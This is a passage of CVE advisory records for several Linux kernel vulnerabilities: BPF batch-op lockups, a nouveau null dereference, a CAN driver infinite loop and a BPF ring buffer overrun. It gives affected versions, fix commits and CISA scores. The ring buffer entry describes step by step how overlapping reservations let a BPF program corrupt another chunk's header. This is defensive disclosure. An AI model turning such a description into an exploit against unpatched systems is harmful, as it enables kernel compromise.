Note that maybe_wait_bpf_programs(map) calls from
generic_map_delete_batch() can be factorized by moving
the call after the loop.
This will be done later in -next tree once we get this fix merged,
unless there is strong opinion doing this optimization sooner.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48939",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:24.541192Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.371Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/syscall.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7ef94bfb08fb9e73defafbd5ddef6b5a0e2ee12b",
"status": "affected",
"version": "cb4d03ab499d4c040f4ab6fd4389d2b49f42b5a5",
"versionType": "git"
},
{
"lessThan": "8628f489b749a4f9767991631921dbe3fbcdc784",
"status": "affected",
"version": "cb4d03ab499d4c040f4ab6fd4389d2b49f42b5a5",
"versionType": "git"
},
{
"lessThan": "7e8099967d0e3ff9d1ae043e80b27fbe46c08417",
"status": "affected",
"version": "cb4d03ab499d4c040f4ab6fd4389d2b49f42b5a5",
"versionType": "git"
},
{
"lessThan": "75134f16e7dd0007aa474b281935c5f42e79f2c8",
"status": "affected",
"version": "cb4d03ab499d4c040f4ab6fd4389d2b49f42b5a5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/syscall.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add schedule points in batch ops\n\nsyzbot reported various soft lockups caused by bpf batch operations.\n\n INFO: task kworker/1:1:27 blocked for more than 140 seconds.\n INFO: task hung in rcu_barrier\n\nNothing prevents batch ops to process huge amount of data,\nwe need to add schedule points in them.\n\nNote that maybe_wait_bpf_programs(map) calls from\ngeneric_map_delete_batch() can be factorized by moving\nthe call after the loop.\n\nThis will be done later in -next tree once we get this fix merged,\nunless there is strong opinion doing this optimization sooner."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:32.805Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7ef94bfb08fb9e73defafbd5ddef6b5a0e2ee12b"
},
{
"url": "https://git.kernel.org/stable/c/8628f489b749a4f9767991631921dbe3fbcdc784"
},
{
"url": "https://git.kernel.org/stable/c/7e8099967d0e3ff9d1ae043e80b27fbe46c08417"
},
{
"url": "https://git.kernel.org/stable/c/75134f16e7dd0007aa474b281935c5f42e79f2c8"
}
],
"title": "bpf: Add schedule points in batch ops",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48939",
"datePublished": "2024-08-22T03:31:34.581Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-05-04T08:26:32.805Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41089 (GCVE-0-2024-41089)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes
In nv17_tv_get_hd_modes(), the return value of drm_mode_duplicate() is
assigned to mode, which will lead to a possible NULL pointer dereference
on failure of drm_mode_duplicate(). The same applies to drm_cvt_mode().
Add a check to avoid null pointer dereference.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.333Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffabad4aa91e33ced3c6ae793fb37771b3e9cb51"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c9f2e60150b4f13789064370e37f39e6e060f50"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56fc4d3b0bdef691831cd95715a7ca3ebea98b2d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5eecb49a6c268dc229005bf6e8167d4001dc09a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/30cbf6ffafbbdd8a6e4e5f0a2e9a9827ee83f3ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7ece609b0ce7a7ea8acdf512a77d1fee26621637"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e49a157d541e7e97b815a56f4bdfcbc89844a59"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d411c8ccc0137a612e0044489030a194ff5c843"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41089",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:38.800751Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:56.138Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/dispnv04/tvnv17.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ffabad4aa91e33ced3c6ae793fb37771b3e9cb51",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1c9f2e60150b4f13789064370e37f39e6e060f50",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "56fc4d3b0bdef691831cd95715a7ca3ebea98b2d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5eecb49a6c268dc229005bf6e8167d4001dc09a0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "30cbf6ffafbbdd8a6e4e5f0a2e9a9827ee83f3ad",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7ece609b0ce7a7ea8acdf512a77d1fee26621637",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e49a157d541e7e97b815a56f4bdfcbc89844a59",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d411c8ccc0137a612e0044489030a194ff5c843",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/dispnv04/tvnv17.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes\n\nIn nv17_tv_get_hd_modes(), the return value of drm_mode_duplicate() is\nassigned to mode, which will lead to a possible NULL pointer dereference\non failure of drm_mode_duplicate(). The same applies to drm_cvt_mode().\nAdd a check to avoid null pointer dereference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:50.536Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ffabad4aa91e33ced3c6ae793fb37771b3e9cb51"
},
{
"url": "https://git.kernel.org/stable/c/1c9f2e60150b4f13789064370e37f39e6e060f50"
},
{
"url": "https://git.kernel.org/stable/c/56fc4d3b0bdef691831cd95715a7ca3ebea98b2d"
},
{
"url": "https://git.kernel.org/stable/c/5eecb49a6c268dc229005bf6e8167d4001dc09a0"
},
{
"url": "https://git.kernel.org/stable/c/30cbf6ffafbbdd8a6e4e5f0a2e9a9827ee83f3ad"
},
{
"url": "https://git.kernel.org/stable/c/7ece609b0ce7a7ea8acdf512a77d1fee26621637"
},
{
"url": "https://git.kernel.org/stable/c/6e49a157d541e7e97b815a56f4bdfcbc89844a59"
},
{
"url": "https://git.kernel.org/stable/c/6d411c8ccc0137a612e0044489030a194ff5c843"
}
],
"title": "drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41089",
"datePublished": "2024-07-29T15:48:04.875Z",
"dateReserved": "2024-07-12T12:17:45.634Z",
"dateUpdated": "2025-05-04T09:21:50.536Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41088 (GCVE-0-2024-41088)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
can: mcp251xfd: fix infinite loop when xmit fails
When the mcp251xfd_start_xmit() function fails, the driver stops
processing messages, and the interrupt routine does not return,
running indefinitely even after killing the running application.
Error messages:
[ 441.298819] mcp251xfd spi2.0 can0: ERROR in mcp251xfd_start_xmit: -16
[ 441.306498] mcp251xfd spi2.0 can0: Transmit Event FIFO buffer not empty. (seq=0x000017c7, tef_tail=0x000017cf, tef_head=0x000017d0, tx_head=0x000017d3).
... and repeat forever.
The issue can be triggered when multiple devices share the same SPI
interface. And there is concurrent access to the bus.
The problem occurs because tx_ring->head increments even if
mcp251xfd_start_xmit() fails. Consequently, the driver skips one TX
package while still expecting a response in
mcp251xfd_handle_tefif_one().
Resolve the issue by starting a workqueue to write the tx obj
synchronously if err = -EBUSY. In case of another error, decrement
tx_ring->head, remove skb from the echo stack, and drop the message.
[mkl: use more imperative wording in patch description]
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:51.605Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f926c022ebaabf7963bebf89a97201d66978a025"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3e72558c1711d524e3150103739ddd06650e291b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c6b4afa59c2fb4d1759235f866d8caed2aa4729"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8fb63e46c884c898a38f061c2330f7729e75510"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41088",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:41.900253Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:56.256Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c",
"drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c",
"drivers/net/can/spi/mcp251xfd/mcp251xfd.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f926c022ebaabf7963bebf89a97201d66978a025",
"status": "affected",
"version": "55e5b97f003e85e66babb55f357627d52081a264",
"versionType": "git"
},
{
"lessThan": "3e72558c1711d524e3150103739ddd06650e291b",
"status": "affected",
"version": "55e5b97f003e85e66babb55f357627d52081a264",
"versionType": "git"
},
{
"lessThan": "6c6b4afa59c2fb4d1759235f866d8caed2aa4729",
"status": "affected",
"version": "55e5b97f003e85e66babb55f357627d52081a264",
"versionType": "git"
},
{
"lessThan": "d8fb63e46c884c898a38f061c2330f7729e75510",
"status": "affected",
"version": "55e5b97f003e85e66babb55f357627d52081a264",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c",
"drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c",
"drivers/net/can/spi/mcp251xfd/mcp251xfd.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: mcp251xfd: fix infinite loop when xmit fails\n\nWhen the mcp251xfd_start_xmit() function fails, the driver stops\nprocessing messages, and the interrupt routine does not return,\nrunning indefinitely even after killing the running application.\n\nError messages:\n[ 441.298819] mcp251xfd spi2.0 can0: ERROR in mcp251xfd_start_xmit: -16\n[ 441.306498] mcp251xfd spi2.0 can0: Transmit Event FIFO buffer not empty. (seq=0x000017c7, tef_tail=0x000017cf, tef_head=0x000017d0, tx_head=0x000017d3).\n... and repeat forever.\n\nThe issue can be triggered when multiple devices share the same SPI\ninterface. And there is concurrent access to the bus.\n\nThe problem occurs because tx_ring-\u003ehead increments even if\nmcp251xfd_start_xmit() fails. Consequently, the driver skips one TX\npackage while still expecting a response in\nmcp251xfd_handle_tefif_one().\n\nResolve the issue by starting a workqueue to write the tx obj\nsynchronously if err = -EBUSY. In case of another error, decrement\ntx_ring-\u003ehead, remove skb from the echo stack, and drop the message.\n\n[mkl: use more imperative wording in patch description]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:49.192Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f926c022ebaabf7963bebf89a97201d66978a025"
},
{
"url": "https://git.kernel.org/stable/c/3e72558c1711d524e3150103739ddd06650e291b"
},
{
"url": "https://git.kernel.org/stable/c/6c6b4afa59c2fb4d1759235f866d8caed2aa4729"
},
{
"url": "https://git.kernel.org/stable/c/d8fb63e46c884c898a38f061c2330f7729e75510"
}
],
"title": "can: mcp251xfd: fix infinite loop when xmit fails",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41088",
"datePublished": "2024-07-29T15:48:04.035Z",
"dateReserved": "2024-07-12T12:17:45.634Z",
"dateUpdated": "2025-05-04T09:21:49.192Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41009 (GCVE-0-2024-41009)
Vulnerability from cvelistv5
Published
2024-07-17 06:10
Modified
2025-05-04 09:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix overrunning reservations in ringbuf
The BPF ring buffer internally is implemented as a power-of-2 sized circular
buffer, with two logical and ever-increasing counters: consumer_pos is the
consumer counter to show which logical position the consumer consumed the
data, and producer_pos which is the producer counter denoting the amount of
data reserved by all producers.
Each time a record is reserved, the producer that "owns" the record will
successfully advance producer counter. In user space each time a record is
read, the consumer of the data advanced the consumer counter once it finished
processing. Both counters are stored in separate pages so that from user
space, the producer counter is read-only and the consumer counter is read-write.
One aspect that simplifies and thus speeds up the implementation of both
producers and consumers is how the data area is mapped twice contiguously
back-to-back in the virtual memory, allowing to not take any special measures
for samples that have to wrap around at the end of the circular buffer data
area, because the next page after the last data page would be first data page
again, and thus the sample will still appear completely contiguous in virtual
memory.
Each record has a struct bpf_ringbuf_hdr { u32 len; u32 pg_off; } header for
book-keeping the length and offset, and is inaccessible to the BPF program.
Helpers like bpf_ringbuf_reserve() return `(void *)hdr + BPF_RINGBUF_HDR_SZ`
for the BPF program to use. Bing-Jhong and Muhammad reported that it is however
possible to make a second allocated memory chunk overlapping with the first
chunk and as a result, the BPF program is now able to edit first chunk's
header.
For example, consider the creation of a BPF_MAP_TYPE_RINGBUF map with size
of 0x4000. Next, the consumer_pos is modified to 0x3000 /before/ a call to
bpf_ringbuf_reserve() is made. This will allocate a chunk A, which is in
[0x0,0x3008], and the BPF program is able to edit [0x8,0x3008]. Now, lets
allocate a chunk B with size 0x3000. This will succeed because consumer_pos
was edited ahead of time to pass the `new_prod_pos - cons_pos > rb->mask`
check. Chunk B will be in range [0x3008,0x6010], and the BPF program is able
to edit [0x3010,0x6010]. Due to the ring buffer memory layout mentioned
earlier, the ranges [0x0,0x4000] and [0x4000,0x8000] point to the same data
pages. This means that chunk B at [0x4000,0x4008] is chunk A's header.
bpf_ringbuf_submit() / bpf_ringbuf_discard() use the header's pg_off to then
locate the bpf_ringbuf itself via bpf_ringbuf_restore_from_rec(). Once chunk
B modified chunk A's header, then bpf_ringbuf_commit() refers to the wrong
page and could cause a crash.
Fix it by calculating the oldest pending_pos and check whether the range
from the oldest outstanding record to the newest would span beyond the ring
buffer size. If that is the case, then reject the request. We've tested with
the ring buffer benchmark in BPF selftests (./benchs/run_bench_ringbufs.sh)
before/after the fix and while it seems a bit slower on some benchmarks, it
is still not significantly enough to matter.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 457f44363a8894135c85b7a9afd2bd8196db24ab Version: 457f44363a8894135c85b7a9afd2bd8196db24ab Version: 457f44363a8894135c85b7a9afd2bd8196db24ab Version: 457f44363a8894135c85b7a9afd2bd8196db24ab Version: 457f44363a8894135c85b7a9afd2bd8196db24ab Version: 457f44363a8894135c85b7a9afd2bd8196db24ab |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.138Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be35504b959f2749bab280f4671e8df96dcf836f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f98f40eb1ed52af8b81f61901b6c0289ff59de4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d1b9df0435bc61e0b44f578846516df8ef476686"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/511804ab701c0503b72eac08217eabfd366ba069"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47416c852f2a04d348ea66ee451cbdcf8119f225"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfa1a2329a691ffd991fcf7248a57d752e712881"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41009",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:25:12.740807Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:06.763Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/ringbuf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "be35504b959f2749bab280f4671e8df96dcf836f",
"status": "affected",
"version": "457f44363a8894135c85b7a9afd2bd8196db24ab",
"versionType": "git"
},
{
"lessThan": "0f98f40eb1ed52af8b81f61901b6c0289ff59de4",
"status": "affected",
"version": "457f44363a8894135c85b7a9afd2bd8196db24ab",
"versionType": "git"
},
{
"lessThan": "d1b9df0435bc61e0b44f578846516df8ef476686",
"status": "affected",
"version": "457f44363a8894135c85b7a9afd2bd8196db24ab",
"versionType": "git"
},
{
"lessThan": "511804ab701c0503b72eac08217eabfd366ba069",
"status": "affected",
"version": "457f44363a8894135c85b7a9afd2bd8196db24ab",
"versionType": "git"
},
{
"lessThan": "47416c852f2a04d348ea66ee451cbdcf8119f225",
"status": "affected",
"version": "457f44363a8894135c85b7a9afd2bd8196db24ab",
"versionType": "git"
},
{
"lessThan": "cfa1a2329a691ffd991fcf7248a57d752e712881",
"status": "affected",
"version": "457f44363a8894135c85b7a9afd2bd8196db24ab",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/ringbuf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.223",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.223",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "5.8",
